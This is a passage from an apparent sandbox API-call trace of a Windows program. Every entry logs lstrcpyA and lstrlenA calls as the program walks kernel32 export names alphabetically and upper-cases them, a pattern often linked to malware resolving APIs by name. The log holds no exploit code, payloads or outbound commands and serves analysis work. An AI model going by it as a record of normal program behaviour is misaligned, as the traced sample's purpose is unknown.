lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0184.099] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0184.099] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0184.099] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0184.099] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0184.099] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0184.099] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0184.099] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0184.099] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0184.099] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0184.099] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0184.099] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0184.099] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0184.099] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0184.099] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0184.099] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0184.099] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0184.099] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0184.099] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0184.099] lstrlenA (lpString="BEEP") returned 4 [0184.099] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0184.100] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0184.100] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0184.100] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0184.100] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0184.100] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0184.100] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0184.100] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0184.100] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0184.100] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0184.100] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0184.100] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0184.100] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0184.100] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0184.100] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0184.100] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0184.100] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0184.100] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0184.100] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0184.100] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0184.100] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0184.100] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0184.100] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0184.100] lstrlenA (lpString="CANCELIO") returned 8 [0184.100] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0184.100] lstrlenA (lpString="CANCELIOEX") returned 10 [0184.100] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0184.100] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0184.100] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0184.100] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0184.100] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0184.100] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0184.100] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0184.100] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0184.100] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0184.100] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0184.101] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0184.101] lstrlenA (lpString="CHECKELEVATION") returned 14 [0184.101] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0184.101] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0184.101] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0184.101] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0184.101] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0184.101] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0184.101] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0184.101] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0184.101] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0184.101] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0184.101] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0184.101] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0184.101] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0184.101] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0184.101] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0184.101] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0184.101] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0184.101] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0184.101] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0184.101] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0184.101] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0184.101] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0184.101] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0184.101] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0184.101] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0184.101] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0184.101] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0184.101] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0184.101] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0184.101] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0184.101] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0184.102] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0184.102] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0184.102] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0184.102] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0184.102] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0184.102] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0184.102] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0184.102] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0184.102] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0184.102] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0184.102] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0184.102] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0184.102] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0184.102] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0184.102] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0184.102] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0184.102] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0184.102] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0184.102] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0184.102] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0184.102] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0184.102] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0184.102] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0184.102] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0184.102] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0184.102] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0184.102] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0184.102] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0184.102] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0184.102] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0184.102] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0184.102] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0184.102] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0184.102] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0184.103] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0184.103] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0184.103] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0184.103] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0184.103] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0184.103] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0184.103] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0184.103] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0184.103] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0184.103] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0184.103] lstrlenA (lpString="COPYCONTEXT") returned 11 [0184.103] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0184.103] lstrlenA (lpString="COPYFILEA") returned 9 [0184.103] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0184.103] lstrlenA (lpString="COPYFILEEXA") returned 11 [0184.103] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0184.103] lstrlenA (lpString="COPYFILEEXW") returned 11 [0184.103] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0184.103] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0184.103] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0184.103] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0184.103] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0184.103] lstrlenA (lpString="COPYFILEW") returned 9 [0184.103] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0184.103] lstrlenA (lpString="COPYLZFILE") returned 10 [0184.103] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0184.103] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0184.103] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0184.103] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0184.103] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0184.103] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0184.103] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0184.103] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0184.103] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0184.103] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0184.103] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0184.104] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0184.104] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0184.104] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0184.104] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0184.104] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0184.104] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0184.104] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0184.104] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0184.104] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0184.104] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0184.104] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0184.104] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0184.104] lstrlenA (lpString="CREATEEVENTA") returned 12 [0184.104] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0184.104] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0184.104] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0184.104] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0184.104] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0184.104] lstrlenA (lpString="CREATEEVENTW") returned 12 [0184.104] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0184.104] lstrlenA (lpString="CREATEFIBER") returned 11 [0184.104] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0184.104] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0184.104] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0184.104] lstrlenA (lpString="CREATEFILEA") returned 11 [0184.104] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0184.104] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0184.105] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0184.105] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0184.105] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0184.105] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0184.105] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0184.105] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0184.105] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0184.105] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0184.105] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0184.105] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0184.105] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0184.105] lstrlenA (lpString="CREATEFILEW") returned 11 [0184.105] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0184.105] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0184.105] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0184.105] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0184.105] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0184.105] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0184.105] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0184.105] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0184.105] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0184.105] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0184.105] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0184.105] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0184.105] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0184.105] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0184.105] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0184.105] lstrlenA (lpString="CREATEJOBSET") returned 12 [0184.105] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0184.105] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0184.105] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0184.105] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0184.105] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0184.106] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0184.106] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0184.106] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0184.106] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0184.106] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0184.106] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0184.106] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0184.106] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0184.106] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0184.106] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0184.106] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0184.106] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0184.106] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0184.106] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0184.106] lstrlenA (lpString="CREATEPIPE") returned 10 [0184.106] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0184.106] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0184.106] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0184.106] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0184.106] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0184.106] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0184.106] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0184.106] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0184.106] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0184.106] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0184.106] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0184.106] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0184.106] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0184.106] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0184.106] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0184.106] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0184.106] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0184.106] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0184.106] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0184.106] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0184.106] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0184.107] lstrlenA 